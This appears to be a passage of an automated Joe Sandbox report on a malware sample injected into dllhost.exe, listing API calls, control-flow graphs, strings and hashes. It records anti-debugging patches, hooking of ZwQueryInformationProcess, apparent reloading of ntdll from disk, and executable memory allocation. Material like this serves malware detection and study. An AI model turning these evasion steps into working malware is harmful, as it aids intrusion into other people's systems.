                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProcProcess$CurrentInformationQuery
                                                                                  • String ID: ZwQueryInformationProcess$ntdll$ntdll.dll
                                                                                  • API String ID: 460765316-442758927
                                                                                  • Opcode ID: b828806d0fd79351611bb38ed87b16235be445b549a03474a29fa1beab70e088
                                                                                  • Instruction ID: c43e8887edb143a630375315b9d9582e51a2876b0aac7502fde47bf8d8371ccf
                                                                                  • Opcode Fuzzy Hash: b828806d0fd79351611bb38ed87b16235be445b549a03474a29fa1beab70e088
                                                                                  • Instruction Fuzzy Hash: 7B01D67BE0030CBBEB0097E5AC49FBE7BBCEB88265F24011AF901E3040D674DA158B64
                                                                                  Function 7FE42DD5 Relevance: 58.2, APIs: 26, Strings: 7, Instructions: 420memorylibraryloaderCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 7fe42dd5-7fe42dea 1 7fe42df0-7fe42df3 0->1 2 7fe432cf-7fe432d3 0->2 3 7fe43162-7fe4316f 1->3 4 7fe42df9-7fe42e0f GetModuleHandleA call 7fe432d4 1->4 3->2 6 7fe43175-7fe43186 3->6 9 7fe42e11-7fe42e16 4->9 10 7fe42e3c-7fe42e44 4->10 6->2 8 7fe4318c-7fe43192 6->8 8->2 11 7fe43198-7fe431b9 VirtualAlloc 8->11 12 7fe42e18-7fe42e28 HeapDestroy 9->12 13 7fe42e2a-7fe42e37 call 7fe436d4 9->13 10->2 14 7fe42e4a-7fe42e55 10->14 11->2 15 7fe431bf-7fe431d6 memcpy 11->15 12->13 13->2 14->2 17 7fe42e5b-7fe42e67 IsBadReadPtr 14->17 18 7fe4320d-7fe43220 call 7fe41b03 15->18 19 7fe431d8-7fe431db 15->19 17->2 22 7fe42e6d-7fe42eb2 VirtualProtect memcpy VirtualProtect 17->22 32 7fe43226-7fe43244 call 7fe41c64 18->32 33 7fe432c2-7fe432c9 VirtualFree 18->33 23 7fe431de-7fe431e2 19->23 27 7fe42eb4-7fe42eb7 22->27 28 7fe42f21-7fe42f29 22->28 24 7fe431e4-7fe431f9 memcpy 23->24 25 7fe431fc-7fe43209 23->25 24->25 25->23 29 7fe4320b 25->29 34 7fe42eba-7fe42ef3 VirtualProtect memset 27->34 30 7fe42f3c-7fe42f52 call 7fe41c64 28->30 31 7fe42f2b-7fe42f39 call 7fe41b03 28->31 29->18 44 7fe42f54-7fe42f5c 30->44 45 7fe42f9f-7fe42fb0 30->45 31->30 32->33 46 7fe43246-7fe4324e 32->46 33->2 38 7fe42ef5-7fe42f0c memcpy 34->38 39 7fe42f0f-7fe42f1c 34->39 38->39 39->34 40 7fe42f1e 39->40 40->28 44->45 49 7fe42f5e-7fe42f64 44->49 47 7fe42fb6-7fe42fb9 45->47 48 7fe4305b-7fe43063 45->48 50 7fe43250-7fe43256 46->50 51 7fe43293-7fe4329b 46->51 54 7fe42fbe-7fe42fdc 47->54 52 7fe43065-7fe4306b 48->52 53 7fe4307f-7fe43083 48->53 49->45 57 7fe42f66-7fe42f6b 49->57 50->51 58 7fe43258-7fe4325d 50->58 55 7fe432b6-7fe432b9 51->55 56 7fe4329d-7fe432a3 51->56 52->53 59 7fe4306d-7fe43071 52->59 53->2 62 7fe43089-7fe4309e VirtualAlloc 53->62 60 7fe42fe7-7fe42ff5 54->60 61 7fe42fde-7fe42fe5 54->61 55->33 65 7fe432bb-7fe432be 55->65 56->55 63 7fe432a5-7fe432a9 56->63 57->45 64 7fe42f6d-7fe42f72 57->64 58->51 66 7fe4325f-7fe43264 58->66 59->53 67 7fe43073-7fe4307d 59->67 69 7fe42ff7-7fe42ffe 60->69 70 7fe43000-7fe43008 60->70 68 7fe43021-7fe4302a 61->68 62->2 71 7fe430a4-7fe4315d GetModuleHandleA RtlCaptureContext memcpy * 2 GetProcessHeap GetModuleHandleA GetProcAddress * 3 62->71 63->55 72 7fe432ab-7fe432b4 63->72 64->45 73 7fe42f74-7fe42f7b 64->73 65->33 74 7fe43266-7fe4326d 66->74 75 7fe43291 66->75 67->59 77 7fe43030-7fe43052 VirtualProtect 68->77 78 7fe4302c 68->78 69->68 70->69 76 7fe4300a-7fe43018 70->76 71->2 72->63 73->45 79 7fe42f7d-7fe42f8a GetTickCount 73->79 74->75 80 7fe4326f-7fe4327c GetTickCount 74->80 75->51 76->68 83 7fe4301a 76->83 77->54 86 7fe43058 77->86 78->77 84 7fe42f91-7fe42f96 79->84 85 7fe42f8c 79->85 87 7fe43283-7fe43288 80->87 88 7fe4327e 80->88 83->68 89 7fe42f9c 84->89 90 7fe42f98-7fe42f9a 84->90 85->84 86->48 91 7fe4328e 87->91 92 7fe4328a-7fe4328c 87->92 88->87 93 7fe42f9d 89->93 90->89 90->93 94 7fe4328f 91->94 92->91 92->94 93->45 94->75
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,7FE4208A), ref: 7FE42DFB
                                                                                    • Part of subcall function 7FE432D4: GetProcessHeap.KERNEL32(00000000,7FE453D0,00000000,7FE42E0C,7FE453D0), ref: 7FE43310
                                                                                    • Part of subcall function 7FE432D4: RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 7FE4331F
                                                                                    • Part of subcall function 7FE432D4: memcpy.NTDLL(00000000,22283E58,?), ref: 7FE4333F
                                                                                    • Part of subcall function 7FE432D4: memcpy.NTDLL(?,22283E58,00000000), ref: 7FE4336A
                                                                                    • Part of subcall function 7FE432D4: IsBadReadPtr.KERNEL32(?,?), ref: 7FE43391
                                                                                    • Part of subcall function 7FE432D4: HeapFree.KERNEL32(?,00000000,?), ref: 7FE433AA
                                                                                  • HeapDestroy.KERNEL32(?), ref: 7FE42E1A
                                                                                  • IsBadReadPtr.KERNEL32(00000000,?), ref: 7FE42E5F
                                                                                  • VirtualProtect.KERNELBASE(00000000,?,00000004,00000000), ref: 7FE42E88
                                                                                  • memcpy.NTDLL(00000000,?,?), ref: 7FE42E94
                                                                                  • VirtualProtect.KERNELBASE(00000000,?,00000000,00000000), ref: 7FE42EA7
                                                                                  • VirtualProtect.KERNELBASE(?,0000010A,00000004,00000000), ref: 7FE42ED7
                                                                                  • memset.NTDLL ref: 7FE42EE7
                                                                                  • memcpy.NTDLL(?,?,00000000), ref: 7FE42F07
                                                                                  • GetTickCount.KERNEL32 ref: 7FE42F7D
                                                                                  • VirtualProtect.KERNELBASE(?,?,00000020,00000000), ref: 7FE4303F
                                                                                  • VirtualAlloc.KERNELBASE(00000000,00001000,00001000,00000040), ref: 7FE43094
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 7FE430A9
                                                                                  • RtlCaptureContext.NTDLL(0000040C), ref: 7FE430C2
                                                                                  • memcpy.NTDLL(00000000,7FE452E4,00000011), ref: 7FE430D0
                                                                                  • memcpy.NTDLL(00000011,7FE433D2,000003EF,00000000,7FE452E4,00000011), ref: 7FE430E3
                                                                                  • GetProcessHeap.KERNEL32 ref: 7FE43103
                                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll,ZwContinue), ref: 7FE4312D
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 7FE4313A
                                                                                  • GetProcAddress.KERNEL32(00000000,VirtualFree), ref: 7FE43146
                                                                                  • GetProcAddress.KERNEL32(00000000,HeapDestroy), ref: 7FE43153
                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00101000,00000040,00000000,7FE4208A), ref: 7FE431AF
                                                                                  • memcpy.NTDLL(00000000,X>(",?), ref: 7FE431C5
                                                                                  • memcpy.NTDLL(?,?,?), ref: 7FE431F4
                                                                                  • GetTickCount.KERNEL32 ref: 7FE4326F
                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 7FE432C9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy$Virtual$Heap$Protect$AddressHandleModuleProc$AllocCountFreeProcessReadTick$AllocateCaptureContextDestroymemset
                                                                                  • String ID: $HeapDestroy$VirtualFree$X>("$ZwContinue$kernel32.dll$ntdll.dll
                                                                                  • API String ID: 1144457544-420683181
                                                                                  • Opcode ID: aec24aa56fb9883356a3063263abbe9963df0538df00baee4cba9280c20f54ed
                                                                                  • Instruction ID: 732545531038e7714358bfe6ab87001606b6185c74c7238915c452f030bfd5c1
                                                                                  • Opcode Fuzzy Hash: aec24aa56fb9883356a3063263abbe9963df0538df00baee4cba9280c20f54ed
                                                                                  • Instruction Fuzzy Hash: 62F1CC76A00305AFDB21CFA5DC84BAAB7BAFF44348F10552DF906AB241D734E994EB50
                                                                                  Function 7FE319AC Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 186COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32 ref: 7FE319B9
                                                                                    • Part of subcall function 7FE31BC0: GetModuleHandleA.KERNEL32(kernel32.dll,?,?,7FE319C5,00000000), ref: 7FE31BD6
                                                                                    • Part of subcall function 7FE31BC0: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 7FE31BE2
                                                                                    • Part of subcall function 7FE31C06: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,00000000), ref: 7FE31C25
                                                                                    • Part of subcall function 7FE31C06: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 7FE31C46
                                                                                    • Part of subcall function 7FE31C06: GetFileSize.KERNEL32(00000000,00000000), ref: 7FE31C5D
                                                                                    • Part of subcall function 7FE31C06: malloc.MSVCRT ref: 7FE31C67
                                                                                    • Part of subcall function 7FE31C06: ReadFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 7FE31C82
                                                                                    • Part of subcall function 7FE31C06: VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004), ref: 7FE31CB6
                                                                                    • Part of subcall function 7FE31C06: memcpy.MSVCRT(00000000,00000000,7FE319D1), ref: 7FE31CC8
                                                                                    • Part of subcall function 7FE31C06: memcpy.MSVCRT(?,00000000,?), ref: 7FE31CEE
                                                                                    • Part of subcall function 7FE31C06: free.MSVCRT ref: 7FE31D06
                                                                                    • Part of subcall function 7FE31C06: CloseHandle.KERNELBASE(7FE319D1), ref: 7FE31D10
                                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 7FE319E5
                                                                                  • memcpy.MSVCRT(Function_00000000,00000000,?), ref: 7FE31A93
                                                                                  • GetCurrentProcess.KERNEL32 ref: 7FE31AC5
                                                                                  • IsBadReadPtr.KERNEL32(?,?), ref: 7FE31B09
                                                                                  • IsBadReadPtr.KERNEL32(00000000,?), ref: 7FE31B17
                                                                                  • memcmp.MSVCRT(?,00000000,?), ref: 7FE31B26
                                                                                  • memcpy.MSVCRT(00000000,?,?,?,?,00001000,00000040,?), ref: 7FE31B5B
                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 7FE31B98
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000003.1819863860.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE31000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_3_7fe31000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy$FileHandleRead$CurrentModuleProcessVirtual$AddressAllocCloseCreateEnvironmentExpandFreeProcSizeStringsfreemallocmemcmp
                                                                                  • String ID: %Systemroot%\system32\combase.dll$%Systemroot%\system32\ntdll.dll$ZwProtectVirtualMemory$combase.dll$ntdll.dll
                                                                                  • API String ID: 288383237-3427567192
                                                                                  • Opcode ID: f1a208d53d8805e2378b0198be8e792b5a9b92c2038927b6b191f4b3b12e1ae7
                                                                                  • Instruction ID: e13732920362c93adadf7f955773acdb4f5f8b940de6f6bd2b25e23fa99a90bd
                                                                                  • Opcode Fuzzy Hash: f1a208d53d8805e2378b0198be8e792b5a9b92c2038927b6b191f4b3b12e1ae7
                                                                                  • Instruction Fuzzy Hash: 4851B375D00319EFDF118FA5C888EEEB7BAEF84335F90415EE802A6140E7396A44CB61
                                                                                  Function 7FE31C06 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99filememoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,00000000), ref: 7FE31C25
                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 7FE31C46
                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 7FE31C5D
                                                                                  • malloc.MSVCRT ref: 7FE31C67
                                                                                  • ReadFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 7FE31C82
                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004), ref: 7FE31CB6
                                                                                  • memcpy.MSVCRT(00000000,00000000,7FE319D1), ref: 7FE31CC8
                                                                                  • memcpy.MSVCRT(?,00000000,?), ref: 7FE31CEE
                                                                                  • free.MSVCRT ref: 7FE31D06
                                                                                  • CloseHandle.KERNELBASE(7FE319D1), ref: 7FE31D10
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000003.1819863860.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE31000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_3_7fe31000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$memcpy$AllocCloseCreateEnvironmentExpandHandleReadSizeStringsVirtualfreemalloc
                                                                                  • String ID: MZ
                                                                                  • API String ID: 674188835-2410715997
                                                                                  • Opcode ID: 226944550cf8b9c8bf3112644910aa94d62cb1f495bc6e49e34df98963ec1635
                                                                                  • Instruction ID: 37ed921750a05b1c156510011ba82f53be2a36d11858f4e25eb232333dd4bf60
                                                                                  • Opcode Fuzzy Hash: 226944550cf8b9c8bf3112644910aa94d62cb1f495bc6e49e34df98963ec1635
                                                                                  • Instruction Fuzzy Hash: 7C31C3BAD00208EFCB208F95CC8CEDEBBBDEF45726F604459F94696140D774AA94DB60
                                                                                  Function 7FE416D7 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 56memorylibraryloaderCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll,00000000,7FE4208A,?,EC8B5500,7FE416D2,?,?,7FE4208A,?,?,?,?,?,00000000,?), ref: 7FE416E0
                                                                                  • GetProcAddress.KERNEL32(00000000,DbgBreakPoint), ref: 7FE416F9
                                                                                  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,7FE4208A,?,?,EC8B5500,7FE416D2,?,?,7FE4208A,?,?,?), ref: 7FE41711
                                                                                  • VirtualProtect.KERNELBASE(00000000,00000004,?,7FE4208A,?,?,EC8B5500,7FE416D2,?,?,7FE4208A,?,?,?), ref: 7FE41722
                                                                                  • GetProcAddress.KERNEL32(00000000,DbgUserBreakPoint), ref: 7FE4172A
                                                                                  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,?,?,EC8B5500,7FE416D2,?,?,7FE4208A,?,?,?,?,?,00000000), ref: 7FE4173D
                                                                                  • VirtualProtect.KERNELBASE(00000000,00000004,7FE4208A,?,?,EC8B5500,7FE416D2,?,?,7FE4208A,?,?,?,?,?,00000000), ref: 7FE4174E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual$AddressProc$HandleModule
                                                                                  • String ID: DbgBreakPoint$DbgUserBreakPoint$ntdll.dll
                                                                                  • API String ID: 2768151571-2163194510
                                                                                  • Opcode ID: dc61deef4fa4a8389b5bc066f4f6e32763e1d74a14b8d98a62bb532b6e57c122
                                                                                  • Instruction ID: 3f854206d3d5076221b1d09f819529f2bcf6369cecf85685e806e0c7a52382f1
                                                                                  • Opcode Fuzzy Hash: dc61deef4fa4a8389b5bc066f4f6e32763e1d74a14b8d98a62bb532b6e57c122
                                                                                  • Instruction Fuzzy Hash: FE01D8772083057FD2119655AC40F7B7BBCDBC6574F10021EFF55A21819B74E415467A
                                                                                  Function 7FE41755 Relevance: 10.7, APIs: 4, Strings: 3, Instructions: 162stringCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 108 7fe41755-7fe41788 call 7fe4257f 111 7fe418c2-7fe418d0 108->111 112 7fe4178e-7fe417c2 call 7fe426c5 call 7fe4285d 108->112 114 7fe41910-7fe41914 111->114 115 7fe418d2 111->115 112->111 122 7fe417c8-7fe417cb 112->122 116 7fe418d5-7fe418f6 call 7fe4194a 115->116 120 7fe418fb-7fe4190e free 116->120 120->114 120->116 122->111 123 7fe417d1-7fe417e2 call 7fe427d7 122->123 123->111 126 7fe417e8-7fe417f4 123->126 126->111 127 7fe417fa-7fe41802 126->127 128 7fe41804-7fe41816 strncmp 127->128 129 7fe4181f-7fe41836 call 7fe4281a 127->129 128->129 131 7fe41818 128->131 129->111 133 7fe4183c-7fe41841 129->133 131->129 134 7fe418b4-7fe418b7 133->134 135 7fe41843-7fe41854 call 7fe427d7 133->135 134->111 137 7fe418b9-7fe418bc 134->137 135->134 139 7fe41856-7fe41861 135->139 137->111 137->123 139->134 140 7fe41863-7fe41866 139->140 141 7fe418a8-7fe418b2 140->141 142 7fe41868-7fe41877 malloc 140->142 141->134 141->135 142->141 143 7fe41879-7fe418a5 memcpy 142->143 143->141
                                                                                  APIs
                                                                                    • Part of subcall function 7FE4257F: lstrlen.KERNEL32(?,?,?,00000000,?,7FE41777,?,/etc/plugins.plist,?), ref: 7FE4259C
                                                                                  • strncmp.NTDLL ref: 7FE4180B
                                                                                  • malloc.MSVCRT ref: 7FE4186C
                                                                                  • memcpy.NTDLL(00000008,?,?), ref: 7FE41889
                                                                                  • free.MSVCRT ref: 7FE418FC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: freelstrlenmallocmemcpystrncmp
                                                                                  • String ID: /etc/plugins.plist$MZ$x86
                                                                                  • API String ID: 3682158708-1713858012
                                                                                  • Opcode ID: 54bb9ffcdce75293fdea451ea1764c5140780be0e9db6a82e14bb8dd9a51f797
                                                                                  • Instruction ID: 957808bbf470da9d99de4376462d0edb45fc24e4bfde69fd6e974ca862a0dbb1
                                                                                  • Opcode Fuzzy Hash: 54bb9ffcdce75293fdea451ea1764c5140780be0e9db6a82e14bb8dd9a51f797
                                                                                  • Instruction Fuzzy Hash: BA510A76D012199FCF01CFE4D9849EEB7B9FF48228F24556EE916B7200E734AA45CB60
                                                                                  Function 7FE42459 Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 100COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 144 7fe42459-7fe4246a 145 7fe42470-7fe42477 144->145 146 7fe42562-7fe4256b 144->146 145->146 147 7fe4247d-7fe42481 145->147 147->146 148 7fe42487-7fe4248b 147->148 148->146 149 7fe42491-7fe42497 148->149 149->146 150 7fe4249d-7fe424e8 149->150 150->146 151 7fe424ea-7fe424f9 calloc 150->151 151->146 152 7fe424fb-7fe42511 call 7fe422d6 151->152 155 7fe42513-7fe42516 152->155 156 7fe4255a-7fe42561 free 152->156 155->156 157 7fe42518-7fe4251b 155->157 156->146 157->156 158 7fe4251d-7fe42521 157->158 158->156 159 7fe42523-7fe42527 158->159 159->156 160 7fe42529-7fe4252d 159->160 160->156 161 7fe4252f-7fe42542 malloc 160->161 161->156 162 7fe42544-7fe42557 memcpy 161->162 162->156
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: callocfreemallocmemcpy
                                                                                  • String ID: !$S$k
                                                                                  • API String ID: 861552148-1352728671
                                                                                  • Opcode ID: c9b9c47c16ca03e766a67db26b61f7cbb891e1b8cbf3b34d4765739f8dd69da7
                                                                                  • Instruction ID: 604d0970c97af9f6bca1788cb46740802a4dd3dc1fb44fca78aaa917fe2bbe24
                                                                                  • Opcode Fuzzy Hash: c9b9c47c16ca03e766a67db26b61f7cbb891e1b8cbf3b34d4765739f8dd69da7
                                                                                  • Instruction Fuzzy Hash: 7A316C729087519AE721CE29E850672BFEADFC1315F14C85EF0BFC6442D778E1498722
                                                                                  Function 004E0273 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 232memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,?), ref: 004E0391
                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00101000,00000040), ref: 004E04A1
                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 004E050B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000003.1819957448.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_3_4e0000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: Virtual$Alloc$Free
                                                                                  • String ID: !$S$k
                                                                                  • API String ID: 3668210933-1352728671
                                                                                  • Opcode ID: 9b9b3c59536dfe2ac67a7b67f04a7fb9125a8182ea0d4415f552f70be9e8cc3c
                                                                                  • Instruction ID: 57d0d97d7b980fa1d3603197d54aa913a39d952eef75df4d28fbe8f2348370fd
                                                                                  • Opcode Fuzzy Hash: 9b9b3c59536dfe2ac67a7b67f04a7fb9125a8182ea0d4415f552f70be9e8cc3c
                                                                                  • Instruction Fuzzy Hash: 2F918771D00269EBDF24CF96C884BAEBBF5AF04306F04855AE965A7241D3B8ED84CF54
                                                                                  Function 7FE31D81 Relevance: 9.1, APIs: 6, Instructions: 127COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(7FE31BB3,00000000,?,?,?,?,?,?,?,7FE31BB3,combase.dll,%Systemroot%\system32\combase.dll), ref: 7FE31D8C
                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,7FE31BB3,combase.dll,%Systemroot%\system32\combase.dll), ref: 7FE31DA1
                                                                                    • Part of subcall function 7FE31C06: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,00000000), ref: 7FE31C25
                                                                                    • Part of subcall function 7FE31C06: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 7FE31C46
                                                                                    • Part of subcall function 7FE31C06: GetFileSize.KERNEL32(00000000,00000000), ref: 7FE31C5D
                                                                                    • Part of subcall function 7FE31C06: malloc.MSVCRT ref: 7FE31C67
                                                                                    • Part of subcall function 7FE31C06: ReadFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 7FE31C82
                                                                                    • Part of subcall function 7FE31C06: VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004), ref: 7FE31CB6
                                                                                    • Part of subcall function 7FE31C06: memcpy.MSVCRT(00000000,00000000,7FE319D1), ref: 7FE31CC8
                                                                                    • Part of subcall function 7FE31C06: memcpy.MSVCRT(?,00000000,?), ref: 7FE31CEE
                                                                                    • Part of subcall function 7FE31C06: free.MSVCRT ref: 7FE31D06
                                                                                    • Part of subcall function 7FE31C06: CloseHandle.KERNELBASE(7FE319D1), ref: 7FE31D10
                                                                                  • IsBadReadPtr.KERNEL32(7FE31BB3,00000080), ref: 7FE31E42
                                                                                  • IsBadReadPtr.KERNEL32(7FE31BB3,00000080), ref: 7FE31E4E
                                                                                    • Part of subcall function 7FE31EEA: memcmp.MSVCRT(7FE31BB3,7FE31E6D,7FE31E6D,7FE31BB3,?,00000080,?,7FE31E6D,7FE31BB3,7FE31BB3,00000080,?,?,?,00000000), ref: 7FE31F0D
                                                                                  • memcpy.MSVCRT(7FE31BB3,7FE31BB3,?,?,?,00001000,00000040,00000004,?,?,?,?,?,?,00000000), ref: 7FE31EA2
                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,00000000,?,?,?,?,?,?,?,7FE31BB3,combase.dll), ref: 7FE31EDF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000003.1819863860.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE31000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_3_7fe31000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileReadmemcpy$HandleVirtual$AllocCloseCreateCurrentEnvironmentExpandFreeModuleProcessSizeStringsfreemallocmemcmp
                                                                                  • String ID:
                                                                                  • API String ID: 1807237107-0
                                                                                  • Opcode ID: 65760951e2fbb1f37c2ca01f434e78f1b247da36f8d6a80a04fa196cab3b0387
                                                                                  • Instruction ID: e66e30e26c8d651dff7f802cc7b867a7bcfc757d2cd4cd66e8dd7680ebece615
                                                                                  • Opcode Fuzzy Hash: 65760951e2fbb1f37c2ca01f434e78f1b247da36f8d6a80a04fa196cab3b0387
                                                                                  • Instruction Fuzzy Hash: 32416275D00209EFDF019FA6CD88AAEBBBAFF44364F54412EE902E7150E735A954CB60
                                                                                  Function 7FE41EF2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53memorylibraryloaderCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 163 7fe41ef2-7fe41f08 GetProcAddress 164 7fe41f0a-7fe41f0f 163->164 165 7fe41f6b-7fe41f6f 163->165 164->165 166 7fe41f11-7fe41f2c call 7fe41f70 164->166 166->165 169 7fe41f2e-7fe41f31 166->169 169->165 170 7fe41f33-7fe41f4c VirtualProtect 169->170 170->165 171 7fe41f4e-7fe41f69 InterlockedExchange VirtualProtect 170->171 171->165
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(?,ZwQueryInformationProcess), ref: 7FE41F00
                                                                                  • VirtualProtect.KERNELBASE(00000001,00000004,00000040,?,7FE41EA9,00000000,?,?,?,?), ref: 7FE41F48
                                                                                  • InterlockedExchange.KERNEL32(?,7FE41EA4), ref: 7FE41F57
                                                                                  • VirtualProtect.KERNELBASE(?,00000004,?,?), ref: 7FE41F69
                                                                                  Strings
                                                                                  • ZwQueryInformationProcess, xrefs: 7FE41EF8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual$AddressExchangeInterlockedProc
                                                                                  • String ID: ZwQueryInformationProcess
                                                                                  • API String ID: 1726986358-1584433389
                                                                                  • Opcode ID: cca9fdba920f07e8de881a81ace27208a19ae97a59725a68c8e7acdeb786ef06
                                                                                  • Instruction ID: 9d314fcda45d8e175856064bc7b8333d7a3f38f698c62f2d4cac807126b7cea3
                                                                                  • Opcode Fuzzy Hash: cca9fdba920f07e8de881a81ace27208a19ae97a59725a68c8e7acdeb786ef06
                                                                                  • Instruction Fuzzy Hash: 4F015B3630020ABBDF024EA1DD45FEA3F7AEF856E4F140129FE099A090D731E5668B94
                                                                                  Function 7FE41E0E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67libraryloaderCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 172 7fe41e0e-7fe41e34 GetModuleHandleA GetProcAddress 173 7fe41e36-7fe41e60 call 7fe41eb3 172->173 174 7fe41eac-7fe41eb0 172->174 173->174 177 7fe41e62-7fe41e65 173->177 177->174 178 7fe41e67-7fe41e76 call 7fe411b0 177->178 181 7fe41e7d-7fe41e7f 178->181 182 7fe41e78-7fe41e7b 178->182 181->177 182->181 183 7fe41e81-7fe41e99 call 7fe41eb3 182->183 183->174 186 7fe41e9b-7fe41ea4 call 7fe41ef2 183->186 188 7fe41ea9 186->188 188->174
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 7FE41E1C
